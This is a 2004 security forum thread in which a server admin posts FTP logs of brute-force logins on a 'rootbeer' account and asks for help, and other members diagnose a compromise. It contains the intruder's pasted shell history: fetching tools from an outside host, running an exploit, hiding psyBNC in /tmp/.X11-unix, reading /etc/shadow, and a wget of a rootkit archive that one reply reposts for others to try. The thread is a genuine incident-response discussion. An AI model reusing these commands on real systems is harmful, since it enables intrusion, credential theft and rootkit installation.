-
November 17th, 2004, 06:21 AM
#1
Senior Member
Suspicious log
Nov 17 08:54:11 hosting pure-ftpd[13724]: (?@210.195.30.50) [WARNING] Authentication failed for user [rootbeer]
Nov 17 08:54:11 hosting pure-ftpd[13730]: (?@210.195.30.50) [INFO] New connection from 210.195.30.50
Nov 17 08:54:12 hosting pure-ftpd[13730]: (?@210.195.30.50) [WARNING] Authentication failed for user [rootbeer]
Nov 17 08:54:12 hosting pure-ftpd[13737]: (?@210.195.30.50) [INFO] New connection from 210.195.30.50
Nov 17 08:54:13 hosting pure-ftpd[13737]: (?@210.195.30.50) [WARNING] Authentication failed for user [rootbeer]
Nov 17 08:54:14 hosting pure-ftpd[13724]: (?@210.195.30.50) [INFO] Logout - CPU time spent: 0.000 seconds.
Nov 17 08:54:15 hosting pure-ftpd[13730]: (?@210.195.30.50) [INFO] Logout - CPU time spent: 0.000 seconds.
Nov 17 08:54:16 hosting pure-ftpd[13737]: (?@210.195.30.50) [INFO] Logout - CPU time spent: 0.000 seconds.
Nov 17 08:54:50 hosting pure-ftpd[13910]: (?@210.195.30.36) [INFO] New connection from 210.195.30.36
Nov 17 08:54:52 hosting pure-ftpd[13910]: (?@210.195.30.36) [WARNING] Authentication failed for user [rootbeer]
Nov 17 08:54:55 hosting pure-ftpd[13929]: (?@210.195.30.36) [INFO] New connection from 210.195.30.36
Nov 17 08:54:55 hosting pure-ftpd[13910]: (?@210.195.30.36) [INFO] Logout - CPU time spent: 0.000 seconds.
Nov 17 08:54:56 hosting pure-ftpd[13929]: (?@210.195.30.36) [WARNING] Authentication failed for user [rootbeer]
Nov 17 08:54:56 hosting pure-ftpd[13936]: (?@210.195.30.36) [INFO] New connection from 210.195.30.36
Nov 17 08:54:57 hosting pure-ftpd[13936]: (?@210.195.30.36) [WARNING] Authentication failed for user [rootbeer]
N
----
Nov 17 09:39:50 hosting pure-ftpd[25356]: (?@210.195.36.227) [INFO] New connection from 210.195.36.227
Nov 17 09:39:51 hosting pure-ftpd[25356]: (?@210.195.36.227) [INFO] rootbeer is now logged in
Nov 17 09:39:54 hosting pure-ftpd[25356]: (rootbeer@210.195.36.227) [INFO] Logout - CPU time spent: 0.000 seconds.
Nov 17 09:44:53 hosting named[2053]: client 218.111.217.111#2671: update 'lanfar.com.my/IN' denied
Nov 17 09:45:07 hosting pure-ftpd[26695]: (?@127.0.0.1) [INFO] New connection from 127.0.0.1
Nov 17 09:45:07 hosting pure-ftpd[26695]: (?@127.0.0.1) [INFO] Logout - CPU time spent: 0.000 seconds.
Nov 17 09:50:12 hosting named[2053]: client 218.111.217.111#2827: update 'lanfar.com.my/IN' denied
Nov 17 09:51:12 hosting pure-ftpd[28557]: (?@210.186.130.187) [INFO] New connection from 210.186.130.187
Nov 17 09:51:12 hosting pure-ftpd[28557]: (?@210.186.130.187) [INFO] rootbeer is now logged in
Nov 17 09:52:05 hosting pure-ftpd[28557]: (rootbeer@210.186.130.187) [NOTICE] /usr/home/rootbeer//in/str00351117095203.zipx u
ploaded (144892 bytes, 3.11KB/sec)
Nov 17 09:52:07 hosting pure-ftpd[28557]: (rootbeer@210.186.130.187) [NOTICE] File successfully renamed or moved: [str0035111
7095203.zipx]->[str00351117095203.zip]
Nov 17 09:52:07 hosting pure-ftpd[28557]: (rootbeer@210.186.130.187) [INFO] Logout - CPU time spent: 0.010 seconds.
based on the log above.. can we say that someone is spooling an IP address and trying to logon to the box using rootbeer user id? there is a lot of this type of log.. for the entire day.. what shd i do? what is he trying to do?
-
November 17th, 2004, 10:49 AM
#2
Do you have a registered user for the box called Rootbeer?.. yes well it looks like a remote log in....by pharting around with proxies..
If you don't have a user called Rootbeer...YOU DO NOW....in other words rooted... now I will sit back, watch and learn..
cheers
"Consumer technology now exceeds the average persons ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr
-
November 17th, 2004, 11:47 AM
#3
grab the zipfile......
Sit back and watch, grab anything else they put there. Popping a packet sniffer like Ethereal on the box would be nice too..... Just watch for outbound connections. When they start, mess with them for a while then kill the hack....
Don\'t SYN us.... We\'ll SYN you.....
\"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides
-
November 17th, 2004, 01:31 PM
#4
Und3ertak3r already noted it. You seem to have a user named rootbeer. If you didn't create it you're screwed. If it is an account you've created, it probably has a simple password. Someone may have bruteforced that password (those are the authentication failed log entries). By using different proxies (source addresses in your logs) your attacker hopes you won't notice it.
Because it's a TCP connection you can probably rule out TCP/IP spoofing. Spoofing a fully blown TCP connection is next to impossible to do over the Internet. Heck, it's hard enough to do in a lab environment.
I'd definitely check out that zipfile. It may contain some tools your attacker plans on using..
This might give you an edge, so it'll be easier to guess what your attacker will do next.
Oliver's Law:
Experience is something you don't get until just after you need it.
-
November 17th, 2004, 03:26 PM
#5
Senior Member
have anyone tried this?
wget sonkeriki.front.ru/sk.tar.gz
-
November 18th, 2004, 10:14 AM
#6
Junior Member
Just did
this excerpt of the contenets should day it all
Hello, dear friend
I have two news for you. Bad one and the bad one:
First, it seems that someone installed rootkit
on your system...
Second, is the fact that I can't execute (errno=%d)
original /sbin/init binary!
And reason why I am telling you this is
that I can't live without this file. It's just
kinda of symbiosis, so, boot from clean floppy,
mount root fs and repair /sbin/init from backup.
(and install me again, if you like :P)
Best regards,
your rootkit .. SoNkErIkI Say`s Have a nice day!
taken from the sk file in the tar
\" I love fools and mistakes i\'m alway\'s making them \" (Charles Darwin)
-
November 18th, 2004, 11:46 AM
#7
Penguin, did you find a reference to that sk.tar.gz file on your system?
If you did, you're definitely 0wn3d
Take the system off-line, backup your data and reinstall everything from original media. Yes, this means nuking your system, there's no way to tell what else "they" may have touched without doing some serious forensic analysis... And don't forget to update your system before putting it online again.
Oliver's Law:
Experience is something you don't get until just after you need it.
-
November 18th, 2004, 05:48 PM
#8
Senior Member
how do i find the file?
i cant find the file..
it seems like deleted..
this is the .bash_history file
w
ping www.yahoo.com
cd /tmp
cd /var/tmp
ls -al
cd /tmp
ftp sonkeriki.front.ru
bye
ls -al
cd /tmp
tar xvf pt.tar
./pt
./pt
id
id
id
id
id
id
id
id
./pt
./pt
./pt
./pt
./pt
./pt
./pt
./pt
w
who
rm -rf pt pt.tar
ls -al
id
ps x
w
w
pwd
cd .X11-unix/
ls -al
ftp sonkeriki.front.ru
tar xzvf p.tar.gz
PATH=.:$PATH
sh
cd ..
exit
bash
clear
exit
w
cd /tmp
cd .X11-unix/
ls -al
rm -rf p.tar.gz
ls -al
mv psybnc .X11-unix
ls -al
cd .X11-unix
make
a
a
pwd
ls -al
mv psybnc sh
ls -al
hostname
sh
clear
exit
w
cat /etc/host
cat /etc/hosts
ifconfig
/sbin/ifconfig -a
uptime
ping www.yahoo.com
cd /tmp
ping www.yahoo.com
clear
exit
hostname
vhost
vhosts
ifconfig
/sbin/ifconfig -a
cat /etc/hosts
id
ls -al
cd /home
ls -al
cat /etc/shadow
cd /tmp
ls -al
su
wget sonkeriki.front.ru/sk.tar.gz
ls -al
tar xzvf sk.tar.gz
rm -rf download.php?URL=sonkeriki.front.ru%2Fsk.tar.gz
ls -al
cd /tmp
ls -al
what do u all think?
-
November 18th, 2004, 05:55 PM
#9
Senior Member
Originally posted here by recca
Just did
this excerpt of the contenets should day it all
taken from the sk file in the tar
hey.. how did u do it? i cannot gunzip the file after downloading it..
-
November 18th, 2004, 07:06 PM
#10
Junior Member
I'm just curious how this person gained "root" level access via your FTP site. Was some form of buffer-overflow exploited in addition to the FTP account brute-forcing? Also.. I assume you HAD to have had an account named "rootbeer" to be cracked by password grinding.
For knowledge sake, I'd suggest you determine if your FTP server (based on its revision) is succeptible to buffer overflow exploits, as I'm not aware of any native FTP based methods of gaining root.
And finally - based on your .bash_history, looks like somebody's staging some great files to play with on your site and is definately looking at setting up some sort of server-based process (hence all the pinging to yahoo.com and reviewing of your network config (ifconfig).
Good luck!
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|